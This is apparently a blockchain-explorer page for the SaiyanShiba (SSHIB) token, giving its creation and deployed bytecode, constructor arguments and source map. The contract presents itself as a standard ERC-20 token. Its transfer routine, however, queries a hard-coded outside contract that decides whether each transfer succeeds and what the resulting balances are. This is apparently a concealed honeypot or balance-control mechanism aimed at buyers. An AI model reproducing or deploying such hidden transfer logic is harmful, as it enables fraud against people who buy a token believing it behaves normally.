1c7610fb1565b5b5f6111d585828601610ffb565b92505060206111e685828601610ffb565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061123457607f821691505b602082108103611247576112466111f0565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f6112a7602883610f11565b91506112b28261124d565b604082019050919050565b5f6020820190508181035f8301526112d48161129b565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6113128261100f565b915061131d8361100f565b9250828203905081811115611335576113346112db565b5b92915050565b5f6113458261100f565b91506113508361100f565b9250828201905080821115611368576113676112db565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6113c8602583610f11565b91506113d38261136e565b604082019050919050565b5f6020820190508181035f8301526113f5816113bc565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611456602683610f11565b9150611461826113fc565b604082019050919050565b5f6020820190508181035f8301526114838161144a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6114e4602483610f11565b91506114ef8261148a565b604082019050919050565b5f6020820190508181035f830152611511816114d8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611572602283610f11565b915061157d82611518565b604082019050919050565b5f6020820190508181035f83015261159f81611566565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611600602583610f11565b915061160b826115a6565b604082019050919050565b5f6020820190508181035f83015261162d816115f4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61168e602383610f11565b915061169982611634565b604082019050919050565b5f6020820190508181035f8301526116bb81611682565b9050919050565b5f6080820190506116d55f83018761118a565b6116e2602083018661118a565b6116ef60408301856110b3565b6116fc60608301846110b3565b95945050505050565b61170e81611080565b8114611718575f80fd5b50565b5f8151905061172981611705565b92915050565b5f8151905061173d81611018565b92915050565b5f805f6060848603121561175a57611759610fb1565b5b5f6117678682870161171b565b93505060206117788682870161172f565b92505060406117898682870161172f565b9150509250925092565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6117c7602083610f11565b91506117d282611793565b602082019050919050565b5f6020820190508181035f8301526117f4816117bb565b905091905056fea2646970667358221220846131a20d8ee6b8da5e59da04c52013362f04e9c35cf736bfe516e7ccfc750b64736f6c6343000814003300000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000b53616979616e536869626100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055353484942000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x6080604052600436106100e0575f3560e01c8063715018a61161007e578063a457c2d711610058578063a457c2d7146102c3578063a9059cbb146102ff578063dd62ed3e1461033b578063f2fde38b14610377576100e7565b8063715018a6146102595780638da5cb5b1461026f57806395d89b4114610299576100e7565b806323b872dd116100ba57806323b872dd1461017b578063313ce567146101b757806339509351146101e157806370a082311461021d576100e7565b806306fdde03146100eb578063095ea7b31461011557806318160ddd14610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61039f565b60405161010c9190610f91565b60405180910390f35b348015610120575f80fd5b5061013b60048036038101906101369190611042565b61042f565b604051610148919061109a565b60405180910390f35b34801561015c575f80fd5b5061016561044c565b60405161017291906110c2565b60405180910390f35b348015610186575f80fd5b506101a1600480360381019061019c91906110db565b610455565b6040516101ae919061109a565b60405180910390f35b3480156101c2575f80fd5b506101cb610550565b6040516101d89190611146565b60405180910390f35b3480156101ec575f80fd5b5061020760048036038101906102029190611042565b610558565b604051610214919061109a565b60405180910390f35b348015610228575f80fd5b50610243600480360381019061023e919061115f565b6105ff565b60405161025091906110c2565b60405180910390f35b348015610264575f80fd5b5061026d610645565b005b34801561027a575f80fd5b50610283610658565b6040516102909190611199565b60405180910390f35b3480156102a4575f80fd5b506102ad61067f565b6040516102ba9190610f91565b60405180910390f35b3480156102ce575f80fd5b506102e960048036038101906102e49190611042565b61070f565b6040516102f6919061109a565b60405180910390f35b34801561030a575f80fd5b5061032560048036038101906103209190611042565b6107fe565b604051610332919061109a565b60405180910390f35b348015610346575f80fd5b50610361600480360381019061035c91906111b2565b61081b565b60405161036e91906110c2565b60405180910390f35b348015610382575f80fd5b5061039d6004803603810190610398919061115f565b61089d565b005b6060600580546103ae9061121d565b80601f01602080910402602001604051908101604052809291908181526020018280546103da9061121d565b80156104255780601f106103fc57610100808354040283529160200191610425565b820191905f5260205f20905b81548152906001019060200180831161040857829003601f168201915b5050505050905090565b5f61044261043b61091f565b8484610926565b6001905092915050565b5f600354905090565b5f610461848484610ae9565b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6104a861091f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610527576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161051e906112bd565b60405180910390fd5b6105448561053361091f565b858461053f9190611308565b610926565b60019150509392505050565b5f6012905090565b5f6105f561056461091f565b848460015f61057161091f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546105f0919061133b565b610926565b6001905092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61064d610dc3565b6106565f610e41565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461068e9061121d565b80601f01602080910402602001604051908101604052809291908181526020018280546106ba9061121d565b80156107055780601f106106dc57610100808354040283529160200191610705565b820191905f5260205f20905b8154815290600101906020018083116106e857829003601f168201915b5050505050905090565b5f8060015f61071c61091f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156107d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107cd906113de565b60405180910390fd5b6107f36107e161091f565b8585846107ee9190611308565b610926565b600191505092915050565b5f61081161080a61091f565b8484610ae9565b6001905092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6108a5610dc3565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610913576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090a9061146c565b60405180910390fd5b61091c81610e41565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610994576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098b906114fa565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a02576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f990611588565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610adc91906110c2565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4e90611616565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbc906116a4565b60405180910390fd5b610bd0838383610f02565b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490505f805f73ce1db262fc320d00507ae4ffb1ec2ccf92b1a7f173ffffffffffffffffffffffffffffffffffffffff1663dd6b8cdc888888886040518563ffffffff1660e01b8152600401610c6794939291906116c2565b606060405180830381865afa158015610c82573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ca69190611743565b92509250925082610cb5575f80fd5b8184610cc19190611308565b60025f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508060025f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610d4e919061133b565b925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610db291906110c2565b60405180910390a350505050505050565b610dcb61091f565b73ffffffffffffffffffffffffffffffffffffffff16610de9610658565b73ffffffffffffffffffffffffffffffffffffffff1614610e3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e36906117dd565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610f3e578082015181840152602081019050610f23565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610f6382610f07565b610f6d8185610f11565b9350610f7d818560208601610f21565b610f8681610f49565b840191505092915050565b5f6020820190508181035f830152610fa98184610f59565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610fde82610fb5565b9050919050565b610fee81610fd4565b8114610ff8575f80fd5b50565b5f8135905061100981610fe5565b92915050565b5f819050919050565b6110218161100f565b811461102b575f80fd5b50565b5f8135905061103c81611018565b92915050565b5f806040838503121561105857611057610fb1565b5b5f61106585828601610ffb565b92505060206110768582860161102e565b9150509250929050565b5f8115159050919050565b61109481611080565b82525050565b5f6020820190506110ad5f83018461108b565b92915050565b6110bc8161100f565b82525050565b5f6020820190506110d55f8301846110b3565b92915050565b5f805f606084860312156110f2576110f1610fb1565b5b5f6110ff86828701610ffb565b935050602061111086828701610ffb565b92505060406111218682870161102e565b9150509250925092565b5f60ff82169050919050565b6111408161112b565b82525050565b5f6020820190506111595f830184611137565b92915050565b5f6020828403121561117457611173610fb1565b5b5f61118184828501610ffb565b91505092915050565b61119381610fd4565b82525050565b5f6020820190506111ac5f83018461118a565b92915050565b5f80604083850312156111c8576111c7610fb1565b5b5f6111d585828601610ffb565b92505060206111e685828601610ffb565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061123457607f821691505b602082108103611247576112466111f0565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f6112a7602883610f11565b91506112b28261124d565b604082019050919050565b5f6020820190508181035f8301526112d48161129b565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6113128261100f565b915061131d8361100f565b9250828203905081811115611335576113346112db565b5b92915050565b5f6113458261100f565b91506113508361100f565b9250828201905080821115611368576113676112db565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6113c8602583610f11565b91506113d38261136e565b604082019050919050565b5f6020820190508181035f8301526113f5816113bc565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611456602683610f11565b9150611461826113fc565b604082019050919050565b5f6020820190508181035f8301526114838161144a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6114e4602483610f11565b91506114ef8261148a565b604082019050919050565b5f6020820190508181035f830152611511816114d8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611572602283610f11565b915061157d82611518565b604082019050919050565b5f6020820190508181035f83015261159f81611566565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611600602583610f11565b915061160b826115a6565b604082019050919050565b5f6020820190508181035f83015261162d816115f4565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61168e602383610f11565b915061169982611634565b604082019050919050565b5f6020820190508181035f8301526116bb81611682565b9050919050565b5f6080820190506116d55f83018761118a565b6116e2602083018661118a565b6116ef60408301856110b3565b6116fc60608301846110b3565b95945050505050565b61170e81611080565b8114611718575f80fd5b50565b5f8151905061172981611705565b92915050565b5f8151905061173d81611018565b92915050565b5f805f6060848603121561175a57611759610fb1565b5b5f6117678682870161171b565b93505060206117788682870161172f565b92505060406117898682870161172f565b9150509250925092565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6117c7602083610f11565b91506117d282611793565b602082019050919050565b5f6020820190508181035f8301526117f4816117bb565b905091905056fea2646970667358221220846131a20d8ee6b8da5e59da04c52013362f04e9c35cf736bfe516e7ccfc750b64736f6c63430008140033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000b53616979616e536869626100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055353484942000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): SaiyanShiba
Arg [1] : symbol_ (string): SSHIB
-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [3] : 53616979616e5368696261000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [5] : 5353484942000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
12631:7299:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13443:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14032:196;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13915:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15624:497;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13814:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17791:292;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13551:143;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11152:103;;;;;;;;;;;;;:::i;:::-;;10511:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13702:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18091:443;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14585:202;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17157:176;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11410:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13443:100;13497:13;13530:5;13523:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13443:100;:::o;14032:196::-;14140:4;14157:39;14166:12;:10;:12::i;:::-;14180:7;14189:6;14157:8;:39::i;:::-;14216:4;14209:11;;14032:196;;;;:::o;13915:109::-;13976:7;14003:13;;13996:20;;13915:109;:::o;15624:497::-;15764:4;15781:36;15791:6;15799:9;15810:6;15781:9;:36::i;:::-;15830:24;15857:11;:19;15869:6;15857:19;;;;;;;;;;;;;;;:33;15877:12;:10;:12::i;:::-;15857:33;;;;;;;;;;;;;;;;15830:60;;15945:6;15925:16;:26;;15903:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;16032:57;16041:6;16049:12;:10;:12::i;:::-;16082:6;16063:16;:25;;;;:::i;:::-;16032:8;:57::i;:::-;16109:4;16102:11;;;15624:497;;;;;:::o;13814:93::-;13872:5;13897:2;13890:9;;13814:93;:::o;17791:292::-;17904:4;17921:130;17944:12;:10;:12::i;:::-;17971:7;18030:10;17993:11;:25;18005:12;:10;:12::i;:::-;17993:25;;;;;;;;;;;;;;;:34;18019:7;17993:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;17921:8;:130::i;:::-;18071:4;18064:11;;17791:292;;;;:::o;13551:143::-;13641:7;13668:9;:18;13678:7;13668:18;;;;;;;;;;;;;;;;13661:25;;13551:143;;;:::o;11152:103::-;10397:13;:11;:13::i;:::-;11217:30:::1;11244:1;11217:18;:30::i;:::-;11152:103::o:0;10511:87::-;10557:7;10584:6;;;;;;;;;;;10577:13;;10511:87;:::o;13702:104::-;13758:13;13791:7;13784:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13702:104;:::o;18091:443::-;18209:4;18226:24;18253:11;:25;18265:12;:10;:12::i;:::-;18253:25;;;;;;;;;;;;;;;:34;18279:7;18253:34;;;;;;;;;;;;;;;;18226:61;;18342:15;18322:16;:35;;18300:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;18435:67;18444:12;:10;:12::i;:::-;18458:7;18486:15;18467:16;:34;;;;:::i;:::-;18435:8;:67::i;:::-;18522:4;18515:11;;;18091:443;;;;:::o;14585:202::-;14696:4;14713:42;14723:12;:10;:12::i;:::-;14737:9;14748:6;14713:9;:42::i;:::-;14775:4;14768:11;;14585:202;;;;:::o;17157:176::-;17271:7;17298:11;:18;17310:5;17298:18;;;;;;;;;;;;;;;:27;17317:7;17298:27;;;;;;;;;;;;;;;;17291:34;;17157:176;;;;:::o;11410:201::-;10397:13;:11;:13::i;:::-;11519:1:::1;11499:22;;:8;:22;;::::0;11491:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;11575:28;11594:8;11575:18;:28::i;:::-;11410:201:::0;:::o;3512:98::-;3565:7;3592:10;3585:17;;3512:98;:::o;16634:382::-;16787:1;16770:19;;:5;:19;;;16762:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16868:1;16849:21;;:7;:21;;;16841:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16952:6;16922:11;:18;16934:5;16922:18;;;;;;;;;;;;;;;:27;16941:7;16922:27;;;;;;;;;;;;;;;:36;;;;16992:7;16976:32;;16985:5;16976:32;;;17001:6;16976:32;;;;;;:::i;:::-;;;;;;;;16634:382;;;:::o;18579:773::-;18737:1;18719:20;;:6;:20;;;18711:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;18821:1;18800:23;;:9;:23;;;18792:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;18876:47;18897:6;18905:9;18916:6;18876:20;:47::i;:::-;18936:21;18960:9;:17;18970:6;18960:17;;;;;;;;;;;;;;;;18936:41;;18991:10;19003:14;19019;19066:42;19037:89;;;19127:6;19135:9;19146:6;19154:13;19037:131;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;18990:178;;;;;;19189:5;19181:14;;;;;;19244:6;19228:13;:22;;;;:::i;:::-;19208:9;:17;19218:6;19208:17;;;;;;;;;;;;;;;:42;;;;19285:6;19261:9;:20;19271:9;19261:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;19326:9;19309:35;;19318:6;19309:35;;;19337:6;19309:35;;;;;;:::i;:::-;;;;;;;;18700:652;;;;18579:773;;;:::o;10676:132::-;10751:12;:10;:12::i;:::-;10740:23;;:7;:5;:7::i;:::-;:23;;;10732:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10676:132::o;11771:191::-;11845:16;11864:6;;;;;;;;;;;11845:25;;11890:8;11881:6;;:17;;;;;;;;;;;;;;;;;;11945:8;11914:40;;11935:8;11914:40;;;;;;;;;;;;11834:128;11771:191;:::o;17024:125::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:180::-;6068:77;6065:1;6058:88;6165:4;6162:1;6155:15;6189:4;6186:1;6179:15;6206:320;6250:6;6287:1;6281:4;6277:12;6267:22;;6334:1;6328:4;6324:12;6355:18;6345:81;;6411:4;6403:6;6399:17;6389:27;;6345:81;6473:2;6465:6;6462:14;6442:18;6439:38;6436:84;;6492:18;;:::i;:::-;6436:84;6257:269;6206:320;;;:::o;6532:227::-;6672:34;6668:1;6660:6;6656:14;6649:58;6741:10;6736:2;6728:6;6724:15;6717:35;6532:227;:::o;6765:366::-;6907:3;6928:67;6992:2;6987:3;6928:67;:::i;:::-;6921:74;;7004:93;7093:3;7004:93;:::i;:::-;7122:2;7117:3;7113:12;7106:19;;6765:366;;;:::o;7137:419::-;7303:4;7341:2;7330:9;7326:18;7318:26;;7390:9;7384:4;7380:20;7376:1;7365:9;7361:17;7354:47;7418:131;7544:4;7418:131;:::i;:::-;7410:139;;7137:419;;;:::o;7562:180::-;7610:77;7607:1;7600:88;7707:4;7704:1;7697:15;7731:4;7728:1;7721:15;7748:194;7788:4;7808:20;7826:1;7808:20;:::i;:::-;7803:25;;7842:20;7860:1;7842:20;:::i;:::-;7837:25;;7886:1;7883;7879:9;7871:17;;7910:1;7904:4;7901:11;7898:37;;;7915:18;;:::i;:::-;7898:37;7748:194;;;;:::o;7948:191::-;7988:3;8007:20;8025:1;8007:20;:::i;:::-;8002:25;;8041:20;8059:1;8041:20;:::i;:::-;8036:25;;8084:1;8081;8077:9;8070:16;;8105:3;8102:1;8099:10;8096:36;;;8112:18;;:::i;:::-;8096:36;7948:191;;;;:::o;8145:224::-;8285:34;8281:1;8273:6;8269:14;8262:58;8354:7;8349:2;8341:6;8337:15;8330:32;8145:224;:::o;8375:366::-;8517:3;8538:67;8602:2;8597:3;8538:67;:::i;:::-;8531:74;;8614:93;8703:3;8614:93;:::i;:::-;8732:2;8727:3;8723:12;8716:19;;8375:366;;;:::o;8747:419::-;8913:4;8951:2;8940:9;8936:18;8928:26;;9000:9;8994:4;8990:20;8986:1;8975:9;8971:17;8964:47;9028:131;9154:4;9028:131;:::i;:::-;9020:139;;8747:419;;;:::o;9172:225::-;9312:34;9308:1;9300:6;9296:14;9289:58;9381:8;9376:2;9368:6;9364:15;9357:33;9172:225;:::o;9403:366::-;9545:3;9566:67;9630:2;9625:3;9566:67;:::i;:::-;9559:74;;9642:93;9731:3;9642:93;:::i;:::-;9760:2;9755:3;9751:12;9744:19;;9403:366;;;:::o;9775:419::-;9941:4;9979:2;9968:9;9964:18;9956:26;;10028:9;10022:4;10018:20;10014:1;10003:9;9999:17;9992:47;10056:131;10182:4;10056:131;:::i;:::-;10048:139;;9775:419;;;:::o;10200:223::-;10340:34;10336:1;10328:6;10324:14;10317:58;10409:6;10404:2;10396:6;10392:15;10385:31;10200:223;:::o;10429:366::-;10571:3;10592:67;10656:2;10651:3;10592:67;:::i;:::-;10585:74;;10668:93;10757:3;10668:93;:::i;:::